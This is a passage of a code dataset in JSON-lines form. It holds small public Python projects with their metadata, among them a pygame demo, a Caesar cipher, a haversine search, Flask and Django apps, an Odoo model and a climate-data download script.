(yes/no): \")\n if continue_input.lower() != 'yes':\n break\n\n\ndef get_valid_numbers(prompt):\n while True:\n try:\n value = float(input(prompt))\n return value\n except ValueError:\n print(\"Invalid input, please enter the correct price\")\n\n\ncreate_rejected_invoices_report()\n", "repo_name": "agunny/Price-Query", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 5033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "google.oauth2.service_account.Credentials.from_service_account_file", "line_number": 11, "usage_type": "call"}, {"api_name": "google.oauth2.service_account.Credentials", "line_number": 11, "usage_type": "name"}, {"api_name": "gspread.authorize", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "18914168784", "text": "from time import sleep\nimport pygame\nimport random\n\npygame.init()\n\nscreen = pygame.display.set_mode([500, 500])\nrunning = True\n\nred = (180, 50, 50)\nsize = (0, 0, 250, 200)\n\n\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n screen.fill((255, 255, 255))\n x = random.randint(180, 440)\n y = random.randint(180, 440)\n pygame.draw.circle(screen, (100, 180, 155), (x, y), 25)\n\n pygame.draw.ellipse(screen, red, size)\n\n pygame.display.flip()\n\npygame.quit()\n", "repo_name": "Jap8nted/aprendiendo_git", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 16, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 20, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.draw.circle", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.draw.ellipse", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "15524201105", "text": "\nfrom art import logo\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndef welcome():\n print(f'{logo}')\n print(f'\\n\\n{\"*\" * 100}\\n\\n')\n\ndef cipher():\n cifrando = True\n while cifrando:\n tarea = input(\"Escribe 'encode' para encriptar, excribe 'decode' para desencriptar: \").lower().strip()\n try:\n saltos = int(input(f'Escribe el 
numero de saltos para la criptografía: '))\n saltos = saltos % 26\n except ValueError:\n print(\"\\n\\nXX - Intenta de nuevo con un número - XX\\n\\n\")\n cipher()\n texto_crudo = input(f'Escribe el texto a encriptar: ').lower()\n\n if tarea == 'decode':\n saltos *= -1\n texto_final = ''\n for letra in texto_crudo:\n if letra not in alphabet:\n texto_final += letra\n continue\n indice = alphabet.index(letra)\n texto_final += (alphabet[indice + saltos])\n print(f'\\n\\nEl texto {tarea} es: {texto_final}\\n\\n')\n\n resp = input(f'¿Quieres seguir cifrando/descifrando texto? (si / no): ')\n if resp == 'no':\n cifrando = False\n\nif __name__ == '__main__':\n welcome()\n cipher()", "repo_name": "ODCenteno/python_100days", "sub_path": "Day_8_functions_cesar/caesar_cipher2.py", "file_name": "caesar_cipher2.py", "file_ext": "py", "file_size_in_byte": 1421, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "art.logo", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "27506424219", "text": "import json\nfrom math import sin, cos, sqrt, atan2, radians\n\n# Read file\nwith open(\"stores-geo.json\") as json_file:\n # Load the file resource with json\n stores = json.load(json_file)\n\n\ndef points_distance(lat1, lng1, lat2, lng2):\n R = 6373.0\n\n lat1 = radians(lat1)\n lng1 = radians(lng1)\n\n lat2 = radians(lat2)\n lng2 = radians(lng2)\n\n dlon = lng2 - lng1\n dlat = lat2 - lat1\n\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * atan2(sqrt(a), sqrt(1 - a))\n\n distance = R * c\n\n return distance\n\n\nradius_lat = 52.002562\nradius_lng = 0.724652\nradius_distance = 100\n\nfor row in stores:\n point_distance = points_distance(radius_lat, radius_lng, row[\"lat\"], row[\"lng\"])\n if radius_distance >= point_distance:\n print(\"distance for : \" + row[\"postcode\"] + \"is \" + str(point_distance))\n", "repo_name": "agavazov/python-postcodes", "sub_path": "draft/5-radius-search.py", "file_name": "5-radius-search.py", "file_ext": "py", "file_size_in_byte": 853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 13, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 14, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 16, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 17, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 22, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 22, "usage_type": "call"}, {"api_name": "math.atan2", "line_number": 23, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "5253436703", "text": "import json \nimport pymongo\nfrom pymongo import MongoClient\nimport os\nfrom config import client\n\n\n# Select the database\ndb = client.messier_registry\n# Select the collection\ncatalog = db[\"catalog\"]\nurl = \"http://messier.obspm.fr/\"\n\n\nclass PushObjectsToDB:\n \"\"\"This class push all objects in the db \"\"\"\n\n\n def __init__(self):\n self.get_objects()\n\n\n def get_objects(self):\n \"\"\"\n FUNCTION THAT GET MESSIER OBJECT\n \n Parameters\n ----------\n None\n\n Loop in each element in catalogue-de-messier.json and add to Database\n\n Returns\n -------\n None\n\n \"\"\"\n with open('./datas/catalogue-de-messier.json') as json_file:\n datas = 
json.load(json_file)\n for obj in datas:\n current_object = obj['fields']\n catalog.insert(current_object)", "repo_name": "wdelenclos/messier-registry", "sub_path": "datas/push_objects.py", "file_name": "push_objects.py", "file_ext": "py", "file_size_in_byte": 871, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "config.client.messier_registry", "line_number": 9, "usage_type": "attribute"}, {"api_name": "config.client", "line_number": 9, "usage_type": "name"}, {"api_name": "json.load", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "16307171429", "text": "from transformers import AutoTokenizer, AutoModelForCausalLM\nimport transformers, torch\nfrom flask import Flask, jsonify, request\n\nmodel = \"tiiuae/falcon-7b-instruct\"\n\nprint(\"Loading pipeline...\")\ntokenizer = AutoTokenizer.from_pretrained(model)\npipeline = transformers.pipeline(\n \"text-generation\",\n model=model,\n tokenizer=tokenizer,\n torch_dtype=torch.bfloat16,\n trust_remote_code=True,\n device_map=\"auto\",\n )\nprint(\"Pipeline loaded\")\n\nparameters = {\n 'max_length':1500,\n 'do_sample':True,\n 'top_k':10,\n 'num_return_sequences':1,\n 'eos_token_id': tokenizer.eos_token_id,\n}\n\napp = Flask(__name__)\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n data = request.get_json()\n prompt = data['inputs']\n try:\n params = data['parameters']\n parameters.update((k, v) for k, v in params.items() if k in parameters)\n parameters['eos_token_id'] = tokenizer.eos_token_id\n except:\n pass\n try:\n sequences = pipeline(prompt, **parameters)\n return jsonify({\"result\": sequences})\n except Exception as e:\n return jsonify({\"result\": e})\n\nif __name__ == \"__main__\":\n app.run()", "repo_name": "SaturdaysAI/falcon-server", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1172, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 8, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 8, "usage_type": "name"}, {"api_name": "transformers.pipeline", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.bfloat16", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "13455878846", "text": "from django.db import models\nfrom django.utils.translation import gettext as _\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.contrib.auth.models import User\n\nfrom core.models import BaseModel\nfrom wannablab.models import Language\n\n\nclass Profile(BaseModel):\n user = models.OneToOneField(\n User,\n verbose_name=_('User'),\n on_delete=models.CASCADE\n )\n\n image = models.ImageField(\n default='default.jpg',\n verbose_name=_('Image'),\n upload_to='profile_pics'\n )\n\n birth_date = models.DateField(\n null=True,\n verbose_name=_('Date of birth'),\n blank=True\n )\n\n info = models.TextField(\n verbose_name=_('Info about user')\n )\n\n city = models.CharField(\n max_length=50,\n verbose_name=_('City')\n )\n\n rating = 
models.IntegerField(\n default=5,\n validators=[MinValueValidator(0), MaxValueValidator(5)],\n verbose_name=_('Rating')\n )\n\n language = models.ForeignKey(\n to=Language,\n related_name='user_language',\n on_delete=models.SET_NULL,\n null=True\n )\n\n def __str__(self):\n return f'{self.user.username} profile'\n\n class Meta:\n db_table = 'profile'\n verbose_name = _('Profile')\n verbose_name_plural = _('Profiles')\n\n\n\n", "repo_name": "valeriiamykhalova/wannablab", "sub_path": "src/users/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1349, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "core.models.BaseModel", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models.CASCADE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models.DateField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models.TextField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.core.validators.MinValueValidator", "line_number": 40, "usage_type": "call"}, {"api_name": "django.core.validators.MaxValueValidator", "line_number": 40, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "wannablab.models.Language", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "70783201446", "text": "\"\"\"\nThis script downloads temperature measurements from http://berkeleyearth.org\n(country mean) for all available countries listed in \"countries.txt\" plus the\ndata for 
Hawaii.\n\nIt uses the library \"requests\" to perform HTTP GET requests to the server and\nget the respective data file. We have to do some clever manipulations because\nthe data files are encoded using Latin1 instead of Unicode. And life is so much\nnicer when everything is Unicode.\n\nAll data files are placed in the \"data\" folder.\n\"\"\"\nimport os\nimport requests\n\n# If the 'data' folder doesn't exist, create it.\nif not os.path.exists('data'):\n    os.mkdir('data')\n    print('Create \"data\" folder.')\nelse:\n    print('Using existing \"data\" folder.')\n    print('WARNING: Will overwrite any files in there!')\n# Empty 'print' will print an empty line.\nprint()\n\n# Load the list of countries\n# Use the 'open' function to open a file for reading. The file content is\n# accessed using the 'country_file' variable.\nwith open('countries.txt') as country_file:\n    # We need to read in the country names, filter out empty strings from the\n    # country list, and strip trailing white space and line breaks.\n    # We'll start with an empty list and fill it with the names from our open\n    # file.\n    countries = []\n    # Using an open file object in a 'for' loop will iterate over the lines of\n    # that file, one at a time, until the end of the file.\n    for line in country_file:\n        # Remove trailing spaces and newlines.\n        stripped = line.strip()\n        # Check if the line is not an empty string after removing trailing\n        # spaces and newlines.\n        if stripped:\n            # Add to the country list\n            countries.append(stripped)\n    # As a bonus, the above code could be substituted by a single line using\n    # Python's coolest feature: list comprehensions.\n    # countries = [line.strip() for line in country_file if line.strip()]\n\n# We'll be sneaky (lazy?) and add Hawaii to our list of countries to download\n# the data from there as well.\ncountries.append('Hawaii')\n\nbaseurl = 'http://berkeleyearth.lbl.gov/auto/Regional/TAVG/Text/'\n\n# We will collect the names of any country that we fail to download.\nfailed = []\n\nprint(\"Downloading data files:\")\n\n# The 'enumerate' function will produce an index number along with the list\n# elements in a 'for' loop. It's very handy.\nfor country_number, country in enumerate(countries):\n    # Print the number of the current country and its name. We add 1 because\n    # enumerate starts from 0.\n    print(' {}. {}... '.format(country_number + 1, country), end='')\n    # Convert to lower case (lower) and use '-' instead of white space in case\n    # of composite names.\n    country_no_spaces = country.lower().replace(' ', '-')\n    # The country names are Unicode strings (with some special characters, like\n    # in \"Åland\"). To get those characters into URLs, we must encode them using\n    # a specific notation (e.g., '%20' instead of ' '). We can do that using\n    # requests. 
Another detail is that the file names on the server are\n    # actually encoded using latin1 instead of Unicode :(\n    country_quoted = requests.utils.quote(country_no_spaces, encoding='latin1')\n    file_name = country_quoted + '-TAVG-Trend.txt'\n    url = baseurl + file_name\n    # Now that we have a URL, we can make a GET request to get back our data\n    # file.\n    request = requests.get(url)\n    # The status code tells us if the request was successful (200).\n    if request.status_code != 200:\n        failed.append(country)\n        print('FAILED')\n    else:\n        # Save the downloaded text to a file in the \"data\" folder.\n        # We can use the 'os' module to operate on paths in a\n        # platform-independent way.\n        # We need to open the file with write permission ('w')\n        with open(os.path.join('data', file_name), 'w') as output_file:\n            # Once again, text encoding is an issue. The data file is encoded\n            # using latin1 instead of unicode (which is what Python likes), so\n            # special characters will break when we read in the data.\n            # Luckily, it's easy to convert the data file to unicode using the\n            # 'decode' method.\n            output_file.write(request.content.decode('latin1'))\n        print('Success')\n\n# An empty list will evaluate to False in an 'if' statement, so we can easily\n# check if any of our downloads failed.\nif failed:\n    print(\"\\nFailed to download data from the following countries:\")\n    for country in failed:\n        print(country)\nelse:\n    print('\\nDone')\n", "repo_name": "leouieda/python-hawaii-2017", "sub_path": "download_data.py", "file_name": "download_data.py", "file_ext": "py", "file_size_in_byte": 4580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.utils.quote", "line_number": 74, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 74, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}]} +{"seq_id": "19566184440", "text": "import argparse\r\nimport os \r\nfrom collections import ChainMap\r\n\r\ndef sum():\r\n    # default values of first and second number\r\n    deff = {'first': 0, 'second': 0}\r\n\r\n    # adding argument parser\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument('-x', '--first', type=int)\r\n    parser.add_argument('-y', '--second', type=int)\r\n    \r\n    # parsing the arguments\r\n    arg = parser.parse_args()\r\n    \r\n    # making a dictionary from the arg\r\n    cla = {key:value for key, value in vars(arg).items() if value} # vars(arg) is equal to arg.__dict__\r\n    \r\n    # create a ChainMap\r\n    chain = ChainMap(cla,os.environ, deff)\r\n    print(chain['first'] + chain['second'])\r\n\r\nif __name__ == \"__main__\":\r\n    sum()\r\n", "repo_name": "data-pirate/collections-module-in-python", "sub_path": "ChainMap.py", "file_name": "ChainMap.py", "file_ext": "py", "file_size_in_byte": 725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.ChainMap", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": 
"attribute"}]} +{"seq_id": "6813168732", "text": " # -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, _\nimport time\nfrom odoo.exceptions import UserError, ValidationError\nimport odoo.addons.decimal_precision as dp\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass Barge(models.Model):\n\t_name = \"shipping.barge\"\n\n\tname = fields.Char(string=\"Name\", size=100 , required=True)\n\tcapacity = fields.Float( string=\"Capacity (WMT)\", required=True, default=0, digits=dp.get_precision('Barge') )\n\t# shipping_ids = fields.One2many(\"shipping.shipping\", inverse_name=\"barge_id\", string=\"Shippings\", readonly=True)\n\twarehouse_id = fields.Many2one(\n 'stock.warehouse', 'Warehouse',\n\t\t\trequired=True,\n ondelete=\"restrict\")\n\tlocation_id = fields.Many2one(\n 'stock.location', 'Location',\n\t\t\tdomain=[ ('usage','=',\"internal\") ],\n ondelete=\"restrict\")\n\tprocurement_rule_id = fields.Many2one(\n 'procurement.rule', 'Procurement Rule',\n\t\t\treadonly=True,\n ondelete=\"restrict\")\n\tactive = fields.Boolean(\n 'Active', default=True,\n help=\"If unchecked, it will allow you to hide the rule without removing it.\")\n\n\t@api.model\n\tdef create(self, values):\n\t\tStockLocation = self.env['stock.location'].sudo()\n\t\tProcurementRule = self.env['procurement.rule'].sudo()\n\t\tStockPickingType = self.env['stock.picking.type'].sudo()\n\t\tStockWarehouse = self.env['stock.warehouse'].sudo()\n\n\t\twarehouse = StockWarehouse.search([ (\"id\", '=', values[\"warehouse_id\"] ) ])\n\t\tpicking_type = StockPickingType.search([ (\"code\", '=', \"outgoing\" ), (\"warehouse_id\", '=', values[\"warehouse_id\"] ) ])\n\t\tif not picking_type:\n\t\t\traise UserError(_(\"Cannot Find Picking Type For Procurement Rule \") )\n\t\t\n\t\tif not values[\"location_id\"] : \n\t\t\tvalues[\"location_id\"] = StockLocation.create({\n\t\t\t\t\t\t\t\t\"name\" : values[\"name\"],\n\t\t\t\t\t\t\t\t\"usage\" : \"internal\",\n\t\t\t\t\t\t\t\t\"location_id\" : warehouse.view_location_id.id ,\n\t\t\t\t\t\t\t}).id\n\n\t\tvalues[\"procurement_rule_id\"] = ProcurementRule.create({\n\t\t\t\t\t\t\t\"name\" : values[\"name\"] + \"-> Customer\",\n\t\t\t\t\t\t\t\"action\" : \"move\",\n\t\t\t\t\t\t\t\"location_src_id\" : values[\"location_id\"] ,\n\t\t\t\t\t\t\t\"warehouse_id\" : values[\"warehouse_id\"] ,\n\t\t\t\t\t\t\t# \"location_id\" : self.env['ir.property'].get_param('property_stock_customer', '').split(',') ,\n\t\t\t\t\t\t\t\"picking_type_id\" : picking_type.id ,\n\t\t\t\t\t\t}).id\n\t\tres = super(Barge, self ).create(values)\n\t\treturn res\n\t\n\t@api.multi\n\tdef unlink(self):\n\t\traise UserError(_(\"Cannot Delete Data, Please Archive It \") )\n\t\t# for rec in self:\n\t\t# \tif rec.location_id:\n\t\t# \t\trec.location_id.toggle_active()\n\t\t# \tif rec.procurement_rule_id:\n\t\t# \t\trec.procurement_rule_id.toggle_active()\n\t\t\n\t\t# return super(Barge, self ).unlink()\n\t\t\n\n", "repo_name": "madukubah/barge", "sub_path": "models/barge.py", "file_name": "barge.py", "file_ext": "py", "file_size_in_byte": 2667, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "odoo.models.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 9, "usage_type": "name"}, {"api_name": "odoo.fields.Char", "line_number": 12, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 12, "usage_type": 
"name"}, {"api_name": "odoo.fields.Float", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 13, "usage_type": "name"}, {"api_name": "odoo.addons.decimal_precision.get_precision", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.addons.decimal_precision", "line_number": 13, "usage_type": "name"}, {"api_name": "odoo.fields.Many2one", "line_number": 15, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 15, "usage_type": "name"}, {"api_name": "odoo.fields.Many2one", "line_number": 19, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 19, "usage_type": "name"}, {"api_name": "odoo.fields.Many2one", "line_number": 23, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 23, "usage_type": "name"}, {"api_name": "odoo.fields.Boolean", "line_number": 27, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 27, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 41, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 41, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 31, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 31, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 63, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 63, "usage_type": "call"}, {"api_name": "odoo.api.multi", "line_number": 61, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "1271526541", "text": "from flask import Flask, request, Response, redirect, render_template, session, url_for\n\nimport time\n\nnum_reg = 0\n\napp = Flask(__name__)\n\n# obteniendo el post resquest\n@app.route('/api', methods=['POST'])\ndef api_response():\n #antes guarda el valor de cuando comenzo a correr el while\n antes = time.perf_counter()\n\n\n if request.method == 'POST':\n #despues es el valor del tiempo despues de recibir respuesta\n despues = time.perf_counter()\n\n # Actualizando el registro\n num_reg += 1\n\n #calculando el tiempo para saver cuanto tiempo paso\n t_sensor1 = despues - antes\n print()\n print(\"Tiempo %\",t_sensor1)\n print(\"Numero de registro %\" ,num_reg)\n\n # Output comparison\n return \"ok\"\n\n@app.route(\"/\")\ndef index():\n\n return render_template(\"index.html\")", "repo_name": "Jcgo3003/Metro", "sub_path": "Versiones/Antiguos/met/application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 827, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "13301239000", "text": "# -*- coding: utf-8 -*-\n\nfrom b3j0f.utils.ut import UTCase\nfrom mock import MagicMock, patch\nfrom unittest import main\n\nfrom link.parallel.drivers.ipython import IPythonDriver\n\n\nclass TestIPythonDriver(UTCase):\n def setUp(self):\n patcher = patch('link.parallel.drivers.ipython.Client')\n self.client = patcher.start()\n self.addCleanup(patcher.stop)\n\n self.client.__getitem__ = 
MagicMock(return_value=MagicMock())\n\n self.drv = IPythonDriver()\n self.drv._view = MagicMock()\n\n self.callback = lambda doc: doc\n self.expected = [1, 2, 3, 4]\n\n self.drv._view.map_sync = MagicMock(return_value=self.expected)\n\n def test_map(self):\n result = list(self.drv.map(self.callback, self.expected))\n\n self.drv._view.map_sync.assert_called_with(\n self.callback,\n self.expected\n )\n self.assertEqual(result, self.expected)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "linkdd/link.parallel", "sub_path": "link/parallel/drivers/test/ipython.py", "file_name": "ipython.py", "file_ext": "py", "file_size_in_byte": 962, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "b3j0f.utils.ut.UTCase", "line_number": 10, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 12, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 16, "usage_type": "call"}, {"api_name": "link.parallel.drivers.ipython.IPythonDriver", "line_number": 18, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 19, "usage_type": "call"}, {"api_name": "mock.MagicMock", "line_number": 24, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "27721209784", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 12 09:34:33 2022\n\n@author: joao.astolfo\n\"\"\"\nimport Shadow\nimport sys\n\nimport inspect\n\nfrom PyQt5 import QtGui, QtWidgets\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtCore import QRect, Qt\nfrom PyQt5.QtWidgets import (QApplication, QFileDialog, QGridLayout, QLabel, QPushButton,\n QCheckBox, QTextEdit, QVBoxLayout, QHBoxLayout, QWidget, QLineEdit,\n QTabWidget, QScrollArea, QGroupBox, QComboBox)\nfrom Shadow import ShadowTools as ST\nfrom orangewidget import gui\nfrom oasys.widgets import gui as oasysgui, widget\nfrom oasys.util.oasys_util import EmittingStream\n\nfrom orangecontrib.shadow.util.python_script import PythonConsole\nfrom orangecontrib.shadow.util.shadow_objects import ShadowBeam, ShadowCompoundOpticalElement\nfrom orangecontrib.shadow.util.shadow_util import ShadowCongruence\n\nfrom orangecontrib.shadow.lnls.widgets.utility.info import classes, funcs\n\nfrom Shadow.ShadowLibExtensions import CompoundOE\n\nimport numpy\nimport Shadow\nimport inspect\n\nclass HybridInfo(widget.OWWidget):\n\n name = \"WIP Hybrid Info\"\n description = \"Hybrid Info. !!! 
WIP !!!\"\n icon = \"icons/info.png\"\n maintainer = \"João Pedro Imbriani Astolfo\"\n maintainer_email = \"joao.astolfo(@at@)lnls.br\"\n priority = 4\n category = \"Info Tools\"\n keywords = [\"data\", \"file\", \"load\", \"read\"]\n \n want_basic_layout = False\n\n inputs = [(\"Input Beam\", ShadowBeam, \"setBeam\")]\n\n WIDGET_WIDTH = 950\n WIDGET_HEIGHT = 650\n\n want_main_area = 1\n want_control_area = 0\n\n input_beam = None\n\n\n def __init__(self, show_automatic_box=True):\n super().__init__()\n \n self.initializeUI()\n \n \n def initializeUI(self):\n geom = QApplication.desktop().availableGeometry()\n \n window_width = round(min(geom.width()*0.98, self.WIDGET_WIDTH))\n window_height = round(min(geom.height() * 0.95, self.WIDGET_HEIGHT))\n \n self.setGeometry(QRect(round(geom.width()*0.05),\n round(geom.height()*0.05),\n window_width,\n window_height))\n \n self.setWindowTitle('Hybrid Info')\n self.setupWidgets()\n \n self.show()\n \n \n def setupWidgets(self):\n \n main_grid = QGridLayout()\n \n # Create section labels\n self.setup_label = QLabel('Setup')\n self.setup_label.setFont(QFont('Arial', 12))\n self.setup_label.setAlignment(Qt.AlignCenter)\n scr_label = QLabel('Python Script')\n scr_label.setFont(QFont('Arial', 12))\n scr_label.setAlignment(Qt.AlignLeft)\n \n# =============================================================================\n# Create setup section\n# =============================================================================\n setup_v_box = QVBoxLayout()\n setup_v_box.setContentsMargins(0,0,0,0)#5, 5, 5, 5)\n \n setup_v_box.addWidget(self.setup_label)\n \n self.vbox = QVBoxLayout()\n self.wi = QGroupBox()\n self.wi.setLayout(self.vbox)\n self.scroll = QScrollArea()\n \n self.scroll.setWidget(self.wi)\n self.scroll.setWidgetResizable(True)\n self.scroll.setFixedHeight(self.WIDGET_HEIGHT*0.75)\n self.scroll.setFixedWidth(self.WIDGET_WIDTH*0.25)\n setup_v_box.addWidget(self.scroll)\n \n # Create buttons\n # 